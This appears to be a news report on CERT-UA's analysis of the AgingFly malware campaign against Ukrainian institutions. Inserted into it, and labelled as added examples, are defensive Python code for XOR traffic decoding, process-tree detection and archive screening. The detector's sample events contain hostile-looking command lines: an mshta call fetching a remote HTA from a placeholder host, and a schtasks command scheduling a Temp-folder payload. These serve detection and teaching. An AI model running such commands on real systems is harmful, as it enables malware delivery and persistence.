A New Threat Emerges Against Ukrainian Infrastructure
Ukrainian cybersecurity officials have identified a previously unknown malware family, dubbed AgingFly, actively being used in cyberattacks targeting local government agencies, hospitals, and potentially representatives of the country's Defense Forces. Ukraine's Computer Emergency Response Team (CERT-UA) detected the campaign last month and has attributed it to a cyber threat cluster it tracks under the designation UAC-0247. The attacks are designed to harvest authentication data from Chromium-based web browsers and the Windows version of WhatsApp messenger.
How the Attack Begins: Phishing via Humanitarian Lures
According to CERT-UA's report published on April 15, 2026, the infection chain is initiated through a targeted phishing email. The message is crafted to appear as a legitimate offer of humanitarian aid, enticing recipients to click an embedded hyperlink. That link redirects victims either to a genuine website that had been previously compromised through a cross-site scripting (XSS) vulnerability, or to a fraudulent website generated with the help of an AI tool — a sign of increasingly sophisticated social engineering tactics.
Once the victim visits the site, they receive a compressed archive containing a shortcut file in LNK format. This file triggers a built-in HTA (HTML Application) handler, which then reaches out to a remote resource to fetch and execute an HTA file. To mask malicious activity, the HTA displays a decoy form to the victim while simultaneously creating a scheduled task in the background. That scheduled task downloads and runs an EXE payload, which proceeds to inject shellcode into a legitimate Windows process.
Multi-Stage Loader and Command Infrastructure
Following initial execution, the attackers deploy a two-stage loader. The second stage uses a custom executable format, and the final payload is both compressed and encrypted to resist analysis. CERT-UA notes that a TCP reverse shell — or an equivalent classified as RAVENSHELL — may serve as a stager at this point, establishing a TCP connection back to the attacker's command-and-control (C2) server.
Communication with the C2 server is encrypted using the XOR cipher, and commands are relayed to the victim machine via the Windows Command Prompt. Alongside the AgingFly payload, a PowerShell script dubbed SILENTLOOP is deployed to execute commands, update the malware's configuration, and dynamically retrieve the C2 server address from a Telegram channel or through fallback mechanisms if the primary channel is unavailable.
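A repeating-key XOR "cipher" is an obfuscation layer rather than encryption, and that matters for incident response: a captured C2 session can be read back if the analyst knows (or can guess) a short stretch of plaintext, such as the banner that cmd.exe prints when a shell is opened. The following is an added example, not CERT-UA or BleepingComputer code; the key, the captured session and the frame layout are constructed here, since the page publishes neither the key nor the traffic format.

```python
"""Recovering a repeating XOR key from captured C2 traffic with known plaintext.
Added example; CONSTRUCTED_KEY, SESSION_PLAINTEXT and the banner offset are
constructed values, not data from the AgingFly campaign."""
from itertools import cycle


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same function encrypts and decrypts."""
    return bytes(b ^ k for b, k in zip(data, cycle(key)))


def recover_keystream(ciphertext: bytes, known: bytes, offset: int) -> bytes:
    """Known plaintext at `offset` reveals exactly that many keystream bytes."""
    segment = ciphertext[offset:offset + len(known)]
    return bytes(c ^ p for c, p in zip(segment, known))


def smallest_period(ks: bytes) -> int:
    """Smallest L such that ks[i] == ks[i+L] for every i. When the known
    plaintext is longer than the key, this is the key length. If no period is
    found, the key is at least as long as the known text and len(ks) is returned."""
    for period in range(1, len(ks)):
        if all(ks[i] == ks[i + period] for i in range(len(ks) - period)):
            return period
    return len(ks)


def recover_key(ciphertext: bytes, known: bytes, offset: int) -> bytes:
    """Derive the key, realigned so that key[0] applies to ciphertext byte 0."""
    ks = recover_keystream(ciphertext, known, offset)
    length = smallest_period(ks)
    key = bytearray(length)
    for i in range(length):
        key[(offset + i) % length] = ks[i]
    return bytes(key)


# --- constructed session -------------------------------------------------------
CONSTRUCTED_KEY = b"k3yZ"  # placeholder key chosen for this example
SESSION_PLAINTEXT = (
    b"Microsoft Windows [Version 10.0.19045.1234]\r\n"
    b"(c) Microsoft Corporation. All rights reserved.\r\n\r\n"
    b"C:\\Users\\victim>whoami\r\nworkstation\\victim\r\n"
)
CAPTURED = xor_bytes(SESSION_PLAINTEXT, CONSTRUCTED_KEY)

# cmd.exe's banner is predictable, so the analyst knows the first 26 bytes.
KNOWN_BANNER = b"Microsoft Windows [Version"


def decode_session(captured: bytes, known: bytes = KNOWN_BANNER, offset: int = 0) -> bytes:
    """Recover the key from the known fragment and decode the whole capture."""
    return xor_bytes(captured, recover_key(captured, known, offset))


if __name__ == "__main__":
    print("key:", recover_key(CAPTURED, KNOWN_BANNER, 0))
    print(decode_session(CAPTURED).decode("ascii", "replace"))
```

The period test only works when the known plaintext is longer than the key; with a shorter fragment the function returns the fragment length and only part of the key is recovered. The same realignment logic handles a known fragment that sits behind a protocol header, which is why `offset` is a parameter.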
Credential Theft from Browsers and WhatsApp
After investigating approximately a dozen incidents, CERT-UA researchers determined that the attackers leverage the open-source security tool ChromElevator to decrypt and extract sensitive data — including saved passwords and cookies — from Chromium-based browsers such as Google Chrome, Microsoft Edge, and Brave, without requiring administrator-level privileges.
In addition to browser data, the threat actor attempts to extract sensitive information from WhatsApp for Windows by decrypting the application's databases using the open-source forensic tool ZAPiDESK. CERT-UA also observed the attacker conducting network reconnaissance and attempting lateral movement across compromised environments, making use of publicly available utilities including the RustScan port scanner and the tunneling tools Ligolo-ng and Chisel.
Inside AgingFly: Dynamic Compilation as an Evasion Strategy
AgingFly is written in C# and provides its operators with a wide range of capabilities, including:
- Remote control of infected systems
- Arbitrary command execution
- File exfiltration
- Screenshot capture
- Keylogging
- Arbitrary code execution
The malware communicates with its C2 server over WebSockets and encrypts that traffic using AES-CBC with a static key.
What makes AgingFly particularly notable — and technically unusual — is its approach to command handling. Rather than shipping with pre-built command handlers embedded in the binary, AgingFly receives those handlers from the C2 server as raw source code, which it then compiles dynamically at runtime on the infected host.
"A distinguishing feature of AGINGFLY compared to similar malware is the absence of built-in command handlers in its code. Instead, they are retrieved from the C2 server as source code and dynamically compiled at runtime," CERT-UA explains.
This design offers the attackers several tangible advantages: the initial payload is smaller and less suspicious, the malware's capabilities can be modified or expanded on demand without redeploying the implant, and static detection by antivirus and endpoint security tools becomes significantly more difficult since there is no stable signature to match against.
However, the approach also comes with trade-offs. It introduces additional operational complexity, creates a dependency on continuous C2 connectivity, leaves a larger footprint at runtime, and ultimately may increase the risk of behavioral detection by security monitoring systems.
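The behavioural footprint mentioned here is concrete. Both the delivery chain from the phishing section (a LNK launching the HTA handler, which fetches a remote HTA and registers a scheduled task that starts an EXE) and runtime compilation of handlers on the host produce process-creation events that a defender can match. The following detection sketch is an added example, not CERT-UA or BleepingComputer code; the events are constructed Sysmon-style process-creation records, and the field names, paths and the assumption that compilation goes through csc.exe (the .NET CodeDom path; an in-process Roslyn compile would not spawn it) are mine, not the page's.

```python
"""Process-tree detection for the LNK -> HTA -> scheduled task -> EXE chain and
for unexpected C# compiler launches. Added example with constructed events."""
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # full path of the new process (assumed field)
    cmdline: str


SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Parents from which csc.exe is expected when a .NET toolchain is present.
# PowerShell's Add-Type also spawns csc.exe; tune this set per environment.
EXPECTED_CSC_PARENTS = {"msbuild.exe", "devenv.exe", "vbcscompiler.exe", "dotnet.exe"}
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public)\\", re.I)


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events: List[ProcEvent]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule_name, detail) for every event matching a rule."""
    by_pid: Dict[int, ProcEvent] = {e.pid: e for e in events}
    findings: List[Tuple[int, str, str]] = []
    for e in events:
        name = basename(e.image)
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image) if parent else ""
        # 1. The HTA handler fetching an HTA from a remote URL (LNK stage).
        if name == "mshta.exe" and re.search(r"https?://", e.cmdline, re.I):
            findings.append((e.pid, "mshta_remote_hta", e.cmdline))
        # 2. A script host registering a scheduled task (background persistence).
        if name == "schtasks.exe" and "/create" in e.cmdline.lower() and pname in SCRIPT_HOSTS:
            detail = e.cmdline
            if USER_WRITABLE.search(e.cmdline):
                detail += "  [task action in user-writable path]"
            findings.append((e.pid, "schtasks_from_script_host", detail))
        # 3. The C# compiler started by something other than a build tool.
        if name == "csc.exe" and pname not in EXPECTED_CSC_PARENTS:
            findings.append((e.pid, "csc_unexpected_parent", f"parent={pname or 'unknown'}"))
    return findings


# Constructed events; ".invalid" is a reserved TLD, the paths are placeholders.
SAMPLE_EVENTS = [
    ProcEvent(50, 1, r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs -s Schedule"),
    ProcEvent(100, 1, r"C:\Windows\explorer.exe", "explorer.exe"),
    # LNK double-click: explorer launches the HTA handler with a remote HTA
    ProcEvent(200, 100, r"C:\Windows\System32\mshta.exe",
              "mshta.exe https://aid-offer.invalid/form.hta"),
    # the HTA registers a task whose action is a payload in %TEMP%
    ProcEvent(300, 200, r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /sc minute /mo 5 /tn "Updater" /tr "C:\Users\u\AppData\Local\Temp\svc.exe"'),
    # the Schedule service starts the payload
    ProcEvent(400, 50, r"C:\Users\u\AppData\Local\Temp\svc.exe", "svc.exe"),
    # the payload compiles a received handler (CodeDom path spawns csc.exe)
    ProcEvent(500, 400, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe",
              r'csc.exe /noconfig /fullpaths @"C:\Users\u\AppData\Local\Temp\abc123.cmdline"'),
    # benign baseline: a local vendor HTA and a real build
    ProcEvent(600, 100, r"C:\Windows\System32\mshta.exe", r"mshta.exe C:\ProgramData\Vendor\wizard.hta"),
    ProcEvent(650, 100, r"C:\Program Files\Microsoft Visual Studio\MSBuild.exe", "MSBuild.exe app.csproj"),
    ProcEvent(700, 650, r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe", "csc.exe /noconfig @app.rsp"),
]

if __name__ == "__main__":
    for pid, rule, detail in detect(SAMPLE_EVENTS):
        print(f"pid={pid} {rule}: {detail}")
```

Rule 3 is the one that turns the "larger runtime footprint" trade-off into a signal: a compiler launched by a binary in a user profile directory has no legitimate reason to exist on a clerk's or clinician's workstation.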
Defensive Recommendations from CERT-UA
To disrupt the attack chain used in this campaign, CERT-UA recommends that organizations and individual users take the following steps:
- Block the execution of LNK shortcut files from untrusted sources
- Prevent the launch of HTA (HTML Application) files
- Restrict execution of JS (JavaScript) files outside of authorized contexts
These three file types are key components of the attack's initial delivery mechanism. Blocking them would effectively prevent UAC-0247 from establishing an initial foothold on targeted systems before the more sophisticated components of the chain can be activated. Organizations operating in sectors that have already been targeted — including local government and healthcare — are urged to implement these controls as a priority.
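Host-side execution blocking is the control CERT-UA names; a complementary control is to stop the archive from reaching the user at all, since the shortcut arrives inside a compressed archive. The following mail-gateway style check is an added example, not CERT-UA or BleepingComputer code: it opens a zip attachment, flags LNK, HTA and JS members, recognises a LNK by its header rather than trusting the file name, and descends one level into nested archives. The sample archives are constructed here.

```python
"""Inspect an archive attachment for the LNK/HTA/JS file types named in the
recommendations. Added example; sample archives are constructed below."""
import io
import zipfile
from typing import Dict, List, Optional, Tuple

# Shell Link header: HeaderSize 0x0000004C followed by the LinkCLSID
# {00021401-0000-0000-C000-000000000046} in its on-disk (mixed-endian) layout.
LNK_MAGIC = bytes.fromhex("4c000000" "0114020000000000c000000000000046")

BLOCKED_EXT = {
    ".lnk": "lnk_extension",
    ".hta": "hta_extension",
    ".js": "js_extension",
    ".jse": "js_extension",
    ".wsf": "js_extension",
}


def classify_member(name: str, data: bytes) -> Optional[str]:
    """Return a block reason for one archive member, or None if it looks benign."""
    if data.startswith(LNK_MAGIC):
        return "lnk_magic"            # catches a LNK renamed to .jpg, .pdf, etc.
    if b"<hta:application" in data[:4096].lower():
        return "hta_content"          # HTA markup regardless of extension
    lower = name.lower()
    for ext, reason in BLOCKED_EXT.items():
        if lower.endswith(ext):
            return reason
    return None


def inspect_archive(blob: bytes, depth: int = 0) -> List[Tuple[str, str]]:
    """List (member_name, reason) for every member that should be blocked."""
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            data = zf.read(info)
            if data[:4] == b"PK\x03\x04" and depth < 2:   # nested zip: recurse
                nested = inspect_archive(data, depth + 1)
                findings.extend((f"{info.filename}/{n}", r) for n, r in nested)
                continue
            reason = classify_member(info.filename, data)
            if reason:
                findings.append((info.filename, reason))
    return findings


def should_block(blob: bytes) -> bool:
    return bool(inspect_archive(blob))


# --- constructed test archives --------------------------------------------------
def _zip(members: Dict[str, bytes]) -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in members.items():
            zf.writestr(name, data)
    return buf.getvalue()


def build_sample_archive() -> bytes:
    """A lure-style archive (constructed; file names are placeholders)."""
    return _zip({
        "Humanitarian_Aid_Offer.pdf.lnk": LNK_MAGIC + b"\x00" * 60,
        "invoice.jpg": LNK_MAGIC + b"\x00" * 60,          # LNK with misleading extension
        "form.hta": b"<html><hta:application id='x'/><body>Application form</body></html>",
        "notes.js": b"// constructed placeholder",
        "inner.zip": _zip({"run.hta": b"<HTA:APPLICATION/>"}),
        "readme.txt": b"Aid distribution schedule",
    })


def build_benign_archive() -> bytes:
    return _zip({"schedule.txt": b"Mon-Fri 09:00-17:00", "report.pdf": b"%PDF-1.4 constructed"})


if __name__ == "__main__":
    for name, reason in inspect_archive(build_sample_archive()):
        print(f"BLOCK {name}: {reason}")
```

Checking the LNK header instead of the extension matters because the blocking rules above are extension-based; an attachment that reaches a user as `something.pdf.lnk` with extensions hidden, or a LNK carried under another name, is caught here by its first 20 bytes.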
Source: BleepingComputer